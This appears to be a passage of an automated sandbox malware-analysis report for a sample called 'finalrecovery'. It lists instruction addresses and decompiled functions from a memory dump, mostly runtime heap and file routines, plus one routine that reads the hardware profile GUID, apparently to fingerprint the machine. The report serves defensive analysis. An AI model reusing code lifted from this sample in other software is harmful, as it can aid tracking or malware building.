0x0040ce16
0x0040ce18
0x0040ce20
0x0040cfa2
0x0040cfa2
0x00000000
0x0040ce26
0x0040ce29
0x0040ce42
0x0040ce46
0x0040ce4c
0x0040cf9d
0x0040cf9d
0x00000000
0x0040ce52
0x0040ce59
0x0040ce62
0x00000000
0x0040ce68
0x0040ce6b
0x0040ce74
0x0040ce9d
0x0040ce9f
0x0040ceae
0x0040ceae
0x0040cea1
0x0040cea2
0x0040cea7
0x0040ceaa
0x0040ceaa
0x00000000
0x0040ce76
0x0040ce76
0x0040ce76
0x0040ce79
0x0040ce7b
0x00000000
0x0040ce81
0x0040ce82
0x0040ce87
0x0040ce8c
0x0040cfa7
0x0040cfa7
0x0040cfac
0x0040cfad
0x0040cfae
0x0040cfaf
0x0040cfb0
0x0040cfb1
0x0040cfb3
0x0040cfb5
0x0040cfc0
0x0040cfc1
0x0040cfc4
0x0040cfc5
0x0040cfc6
0x0040cfc7
0x0040cfce
0x0040cfd2
0x0040cfd8
0x0040cfdb
0x0040cfdd
0x0040cfe3
0x0040cfe5
0x0040cfe8
0x0040cffc
0x0040d005
0x0040d00f
0x0040d017
0x0040d019
0x0040d01c
0x0040d021
0x0040d18d
0x0040d18d
0x00000000
0x0040d027
0x0040d02a
0x0040d043
0x0040d047
0x0040d04b
0x0040d04d
0x0040d188
0x0040d188
0x00000000
0x0040d053
0x0040d053
0x0040d058
0x0040d05a
0x0040d05d
0x0040d063
0x00000000
0x0040d069
0x0040d06c
0x0040d06f
0x0040d072
0x0040d075
0x0040d07a
0x0040d0a3
0x0040d0a5
0x0040d0b4
0x0040d0b4
0x0040d0a7
0x0040d0a8
0x0040d0ad
0x0040d0b0
0x0040d0b0
0x0040d0b6
0x00000000
0x0040d07c
0x0040d07c
0x0040d07c
0x0040d07f
0x0040d081
0x00000000
0x0040d087
0x0040d088
0x0040d08d
0x0040d090
0x0040d092
0x0040d192
0x0040d192
0x0040d19c
0x0040d1a7
0x0040d1b0
0x0040d1b5
0x0040d1b6
0x0040d1b7
0x0040d1b8
0x0040d1b9
0x0040d1ba
0x0040d1bb
0x0040d1bc
0x0040d1bd
0x0040d1be
0x0040d1bf
0x0040d1c0
0x0040d1c1
0x0040d1c3
0x0040d1c6
0x0040d1c7
0x0040d1c9
0x0040d1d0
0x0040d1d1
0x0040d1d2
0x0040d1d7
0x0040d1da
0x0040d1dd
0x0040d2e9
0x00000000
0x0040d1e3
0x0040d1e3
0x0040d1e9
0x0040d1ec
0x0040d1ef
0x0040d1f1
0x0040d1f9
0x0040d1fd
0x0040d1ff
0x0040d208
0x0040d20a
0x0040d20c
0x0040d201
0x0040d201
0x0040d201
0x0040d1f3
0x0040d1f3
0x0040d1f3
0x0040d21b
0x0040d21d
0x0040d223
0x0040d24f
0x0040d251
0x0040d263
0x0040d263
0x0040d253
0x0040d254
0x0040d259
0x0040d25c
0x0040d25f
0x0040d25f
0x00000000
0x0040d225
0x0040d225
0x0040d225
0x0040d228
0x0040d22a
0x0040d2ee
0x0040d2ee
0x00000000
0x0040d230
0x0040d231
0x0040d236
0x0040d239
0x0040d23b
0x0040d2f3
0x0040d2f3
0x0040d2f8
0x0040d2f9
0x0040d2fa
0x0040d2fb
0x0040d2fc
0x0040d2fd
0x0040d2fe
0x0040d2ff
0x0040d300
0x0040d301
0x0040d303
0x0040d304
0x0040d305
0x0040d307
0x0040d309
0x0040d30b
0x0040d357
0x0040d35a
0x0040d310
0x0040d310
0x0040d310
0x0040d313
0x0040d316
0x00000000
0x0040d318
0x0040d318
0x0040d31a
0x0040d31b
0x0040d321
0x0040d335
0x0040d335
0x0040d337
0x0040d33c
0x00000000
0x0040d323
0x0040d323
0x0040d326
0x0040d32e
0x0040d331
0x0040d35b
0x0040d360
0x0040d361
0x0040d362
0x0040d363
0x0040d364
0x0040d365
0x0040d366
0x0040d367
0x0040d368
0x0040d369
0x0040d36a
0x0040d36b
0x0040d36c
0x0040d36d
0x0040d36e
0x0040d36f
0x0040d370
0x0040d373
0x0040d374
0x0040d375
0x0040d377
0x0040d379
0x0040d37b
0x0040d3c7
0x0040d3ca
0x0040d380
0x0040d380
0x0040d380
0x0040d383
0x0040d386
0x00000000
0x0040d388
0x0040d388
0x0040d38a
0x0040d38b
0x0040d391
0x0040d3a5
0x0040d3a5
0x0040d3a7
0x0040d3ac
0x00000000
0x0040d393
0x0040d393
0x0040d396
0x0040d39e
0x0040d3a1
0x0040d3cb
0x0040d3d0
0x0040d3d1
0x0040d3d2
0x0040d3d3
0x0040d3d4
0x0040d3d5
0x0040d3d6
0x0040d3d7
0x0040d3d8
0x0040d3d9
0x0040d3da
0x0040d3db
0x0040d3dc
0x0040d3dd
0x0040d3de
0x0040d3df
0x0040d3e0
0x0040d3e2
0x0040d3e4
0x00000000
0x0040d3ea
0x0040d3ec
0x0040d3a3
0x0040d3a3
0x00000000
0x0040d3a3
0x0040d3a1
0x0040d391
0x00000000
0x0040d3af
0x0040d3af
0x0040d3b6
0x0040d3bd
0x0040d3c0
0x0040d3c3
0x0040d3c3
0x00000000
0x0040d380
0x0040d333
0x0040d333
0x00000000
0x0040d333
0x0040d331
0x0040d321
0x00000000
0x0040d33f
0x0040d33f
0x0040d346
0x0040d34d
0x0040d350
0x0040d353
0x0040d353
0x00000000
0x0040d310
0x0040d241
0x0040d241
0x0040d244
0x0040d247
0x0040d24a
0x0040d265
0x0040d265
0x0040d26c
0x0040d26f
0x0040d272
0x0040d273
0x0040d2c4
0x0040d2c5
0x0040d2c6
0x0040d2cb
0x0040d2d6
0x0040d2d9
0x0040d2df
0x0040d2e6
0x0040d275
0x0040d275
0x0040d277
0x0040d278
0x0040d279
0x0040d27e
0x0040d281
0x0040d28a
0x0040d28b
0x0040d28e
0x0040d293
0x0040d299
0x0040d2ad
0x0040d2ad
0x0040d2af
0x0040d2b7
0x0040d2c1
0x0040d29b
0x0040d29b
0x0040d29e
0x0040d2a1
0x0040d2a6
0x0040d2a9
0x00000000
0x0040d2ab
0x0040d2ab
0x00000000
0x0040d2ab
0x0040d2a9
0x0040d299
0x0040d273
0x0040d23b
0x0040d22a
0x0040d223
0x0040d098
0x0040d098
0x0040d09b
0x0040d09e
0x0040d0b9
0x0040d0bf
0x0040d0c2
0x0040d0cc
0x0040d0cf
0x0040d0d2
0x0040d0d7
0x0040d0da
0x0040d0df
0x0040d0e1
0x0040d0e4
0x0040d0e7
0x0040d0e8
0x0040d0e9
0x0040d0eb
0x0040d0ef
0x0040d0f4
0x0040d0f7
0x0040d0fa
0x0040d0fd
0x0040d0fd
0x0040d0fe
0x0040d103
0x0040d105
0x0040d108
0x0040d10a
0x0040d15a
0x0040d15e
0x0040d169
0x0040d16f
0x0040d16f
0x0040d171
0x0040d177
0x0040d185
0x0040d10c
0x0040d10f
0x0040d110
0x0040d11d
0x0040d11f
0x0040d133
0x0040d136
0x0040d13c
0x0040d150
0x0040d150
0x0040d152
0x00000000
0x0040d13e
0x0040d13e
0x0040d141
0x0040d144
0x0040d149
0x0040d14c
0x00000000
0x0040d14e
0x0040d14e
0x00000000
0x0040d14e
0x0040d14c
0x0040d13c
0x0040d10a
0x0040d092
0x0040d081
0x0040d07a
0x0040d063
0x0040d04d
0x0040ce92
0x0040ce92
0x0040ce95
0x0040ce98
0x0040ceb0
0x0040ceb3
0x0040ceb6
0x0040ceb9
0x0040cec0
0x0040cec3
0x0040ceca
0x0040ced1
0x0040ced4
0x0040ced7
0x0040ceda
0x0040cedf
0x0040cee4
0x0040cee7
0x0040ceee
0x0040cef5
0x0040cef8
0x0040cefa
0x0040cefd
0x0040cefe
0x0040cf01
0x0040cf05
0x0040cf0d
0x0040cf10
0x0040cf16
0x0040cf19
0x0040cf19
0x0040cf1a
0x0040cf1f
0x0040cf21
0x0040cf26
0x0040cf7c
0x0040cf80
0x0040cf8b
0x0040cf93
0x0040cf9a
0x0040cf28
0x0040cf2b
0x0040cf2c
0x0040cf39
0x0040cf3b
0x0040cf52
0x0040cf5b
0x0040cf6f
0x0040cf6f
0x0040cf71
0x0040cf76
0x00000000
0x0040cf5d
0x0040cf5d
0x0040cf60
0x0040cf63
0x0040cf6b
0x00000000
0x0040cf6d
0x0040cf6d
0x00000000
0x0040cf6d
0x0040cf6b
0x0040cf5b
0x0040cf26
0x0040ce8c
0x0040ce7b
0x0040ce74
0x0040ce62
0x0040ce4c
0x00000000

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0040CF9D

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 1397ffc934538b626476cd493329b61344a12dd994907e9f2fbb1a93078e92e4
Instruction ID: 42a73b8cd40f08eae9db7075c415a157612d9f564d801a59de967a34d64779d4
Opcode Fuzzy Hash: 1397ffc934538b626476cd493329b61344a12dd994907e9f2fbb1a93078e92e4
Instruction Fuzzy Hash: FA51C271A00105CFCB0CDF5CC991AAEB7E6EF88300B14866ED806AF396D735EA15C795

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9F1 Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041AAA4

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
Instruction ID: d233c4eaac6dc4320f13e0444e48b2e862e70474e60c8a4cc461f4959c90e5e2
Opcode Fuzzy Hash: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
Instruction Fuzzy Hash: 7131A076A016109F8B14CF6DC58089EB7F2FF8932072585A6E515EB360C334AC46CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00406760 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406760(unsigned int __ebx, unsigned int* __ecx, void* __edi) {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v132;
				unsigned int* _v136;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t19;
				signed int _t20;
				intOrPtr _t25;
				intOrPtr* _t36;
				void* _t43;
				unsigned int* _t45;
				signed int _t46;

				_t31 = __ecx;
				_t16 =  *0x43d054; // 0x8e1b5714
				_v8 = _t16 ^ _t46;
				_t45 = __ecx;
				_v136 = __ecx;
				_v136 = __ecx;
				_t19 = GetCurrentHwProfileA( &_v132); // executed
				if(_t19 == 0) {
					_t20 = E00417D76(_t31, __eflags);
					asm("cdq");
					E004055C0(_t45, _t20 % 0xa + 5);
					__eflags = _v8 ^ _t46;
					return E0040EB3F(_t45, __ebx, _v8 ^ _t46, _t20 % 0xa + 5, __edi, _t45);
				} else {
					_t36 =  &(_v132.szHwProfileGuid);
					 *_t45 = 0;
					 *((intOrPtr*)(_t45 + 0x10)) = 0;
					_t43 = _t36 + 1;
					 *((intOrPtr*)(_t45 + 0x14)) = 0xf;
					 *_t45 = 0;
					do {
						_t25 =  *_t36;
						_t36 = _t36 + 1;
					} while (_t25 != 0);
					E004026C0(__ebx, _t45,  &(_v132.szHwProfileGuid), _t36 - _t43);
					return E0040EB3F(_t45, __ebx, _v8 ^ _t46, _t43, __edi, _t45);
				}
			}

0x00406760
0x00406769
0x00406770
0x00406774
0x00406779
0x00406780
0x00406786
0x0040678e
0x004067d6
0x004067db
0x004067e8
0x004067f2
0x004067fd
0x00406790
0x00406790
0x00406793
0x00406799
0x004067a0
0x004067a3
0x004067aa
0x004067b0
0x004067b0
0x004067b2
0x004067b3
0x004067c0
0x004067d5
0x004067d5

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00406786

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7b617362b1cada53b484a7e50f6844af9204a4e76a0345a278f81f5a3944ce47
Instruction ID: 6af4a74c553faffd4ed34f540c5fb58e0fa2daee19e35746602b42ed4a7c5d3a
Opcode Fuzzy Hash: 7b617362b1cada53b484a7e50f6844af9204a4e76a0345a278f81f5a3944ce47
Instruction Fuzzy Hash: 2C11A530B00218CBDB24EF69D8557FEB7B9EF09308F4046AEE84697381DF7959098B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041E039 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041E039(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E0041DE0F(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E0042861E( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x45061c =  *0x45061c + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}

0x0041e04a
0x0041e056
0x0041e057
0x0041e058
0x0041e05f
0x0041e0b8
0x0041e0bb
0x0041e061
0x0041e073
0x0041e07d
0x00000000
0x0041e07f
0x0041e082
0x0041e08e
0x0041e096
0x0041e09c
0x0041e0a2
0x0041e0a8
0x0041e0b0
0x0041e0b7
0x0041e0b7
0x0041e07d

APIs

__wsopen_s.LIBCMT ref: 0041E073

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
Instruction ID: bd239f600e32680d44d390715ce2ceb55c4993d9d37c0227420fd10ede5275c9
Opcode Fuzzy Hash: d4cc4cf86e9e065f416ef9d63789a222c11f165fcbbbb45fb3f736e95baad7dc
Instruction Fuzzy Hash: 5F111575A0420AAFCF05DF59E9419DF7BF5EF48304F04406AF809AB352D670EA25CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1DB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041E1DB(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x450ce0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0041C651();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00413571(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E0041A08C(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x0041e1e1
0x0041e1e6
0x0041e1f4
0x0041e1f4
0x0041e1fa
0x0041e1fc
0x0041e1fc
0x0041e213
0x0041e21c
0x0041e224
0x00000000
0x00000000
0x0041e204
0x0041e206
0x0041e228
0x0041e22d
0x0041e233
0x00000000
0x0041e233
0x0041e20f
0x0041e211
0x00000000
0x00000000
0x0041e211
0x00000000
0x0041e213
0x0041e1ec
0x0041e1f2
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0041CC85,00000001,00000364,00000006,000000FF,?,0040FF1B,?,?,?,?), ref: 0041E21C

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c8eebbc74677787af7c36d96244fa65b529023c8f115efc6b6e14e7cb2936f58
Instruction ID: 8eb85e3452bb25f7ba2047a137128702a5f05961d12138cad4fcd3d63aea74b1
Opcode Fuzzy Hash: c8eebbc74677787af7c36d96244fa65b529023c8f115efc6b6e14e7cb2936f58
Instruction Fuzzy Hash: 17F0503958013167AB311B639C107DB774DAF45760B144167FC04D6251CF7CD8C181EE

Uniqueness

Uniqueness Score: -1.00%

Function 0041ECAF Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041ECAF(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00413571(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x450ce0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0041C651();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E0041A08C(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0041ecb5
0x0041ecbb
0x0041eced
0x0041ecf2
0x0041ecf8
0x00000000
0x0041ecf8
0x0041ecbf
0x0041ecc1
0x0041ecc1
0x0041ecd8
0x0041ece1
0x0041ece9
0x00000000
0x00000000
0x0041ecc9
0x0041eccb
0x00000000
0x00000000
0x0041ecd4
0x0041ecd6
0x00000000
0x00000000
0x0041ecd6
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF1B,?,?,?,?,?,00403757,?,?,?), ref: 0041ECE1

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
Instruction ID: 433635af7a13910e1ced143a486ef80bcade6400672ce29434cd2295681cad25
Opcode Fuzzy Hash: 5231c26b2e5400a8b445dea9dc5c14e3c1ee74f90dcd341e6a6c6bc4848ff768
Instruction Fuzzy Hash: 73E0653964122097E621267B9D00BDB7E59BB417A5F150127FC05962D1EA6DCCC181EE

Uniqueness

Uniqueness Score: -1.00%

Function 1000797E Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000797E(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E100058B6(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x10018120, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E1000A85E();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E10005A7D(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x10007984
0x1000798a
0x100079bc
0x100079c1
0x100079c7
0x00000000
0x100079c7
0x1000798e
0x10007990
0x10007990
0x100079a7
0x100079b0
0x100079b8
0x00000000
0x00000000
0x10007998
0x1000799a
0x00000000
0x00000000
0x100079a3
0x100079a5
0x00000000
0x00000000
0x100079a5
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,10001F3C,?,?,100026E9,10001F3C,?,10001F3C,0007A120), ref: 100079B0

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 41353e0b5b14e6947e7b84ef9c479746a73b7095d09373ad233c4efc719be286
Instruction ID: 8ae1d9aeb8dca28a6c57acb355fc0b14e875e93249a4ab3e943a6d052c0edab9
Opcode Fuzzy Hash: 41353e0b5b14e6947e7b84ef9c479746a73b7095d09373ad233c4efc719be286
Instruction Fuzzy Hash: C3E06535E0152166FA11E6659D01B4B3A89FF426F0F124124FD4896199EF69DD0082F2

Uniqueness

Uniqueness Score: -1.00%

Function 004282F7 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004282F7(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x00428314
0x0042831b

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,004286E7,?,?,00000000,?,004286E7,00000000,0000000C), ref: 00428314

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
Instruction ID: 6a3501348c7adacfcd1c424c20773ecf10769bdff7a35cf21c7a2e113d4d802e
Opcode Fuzzy Hash: b718aefa274249b92c0224c2ff73fbbbd694e56a9348850d4764fd55e00e249d
Instruction Fuzzy Hash: 19D06C3210014DFBDF128F85DC06EDA3BAAFB48714F014010BA1856060C772E822AB95

Uniqueness

Uniqueness Score: -1.00%

Function 10005B84 Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10005B84(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E100079CC(_a4); // executed
				return _t5;
			}

0x10005b8d
0x10005b97
0x10005b9e

APIs

_free.LIBCMT ref: 10005B97

Part of subcall function 100079CC: RtlFreeHeap.NTDLL(00000000,00000000,?,10006680), ref: 100079E2
Part of subcall function 100079CC: GetLastError.KERNEL32(?,?,10006680), ref: 100079F4

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction ID: 71677ea853f53e0e4ddb9aac9ecc9536995eaabd0c95d75e6f2dc2d28cb494ef
Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction Fuzzy Hash: 61C04C75500208BBDF05DB45D906A4E7FA9EB812A8F604054F41957251DAB5EE449690

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA0 Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402EA0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x00402eaf
0x00402eb6

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00402EAF

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
Instruction ID: b31a385f3b57fd4fd7166e142863b1bbbb6af29b0bf7193fe4047b5eb220286a
Opcode Fuzzy Hash: 213a422f90c8c6353df42cf4beb6bca1ece7b85540c8c8c994e7d48a5d8c3a30
Instruction Fuzzy Hash: CAC0483200020DFBCF025F82EC048DA3F2AFB08261B408024FA1C04030C7739972ABAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC0 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402EC0(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x00402ecc
0x00402ed3

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402ECC

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
Instruction ID: bdb844541333acea6d7cc9b38086a4600084955ffe6c4e25b5f0fe259d46e886
Opcode Fuzzy Hash: 9e517827ee14b2795f6c39b1ac259b67fb15a98946d76ce23e4192bd4712f48a
Instruction Fuzzy Hash: E4B0483200020CBB8F021F82EC048993F2AFB08260B448420FA180502087729522AB84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426D1F Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00426D1F(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E0041CAE3(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00426CB2(0x4328d0, 0x16, _t116);
					_t91 =  *_t123;
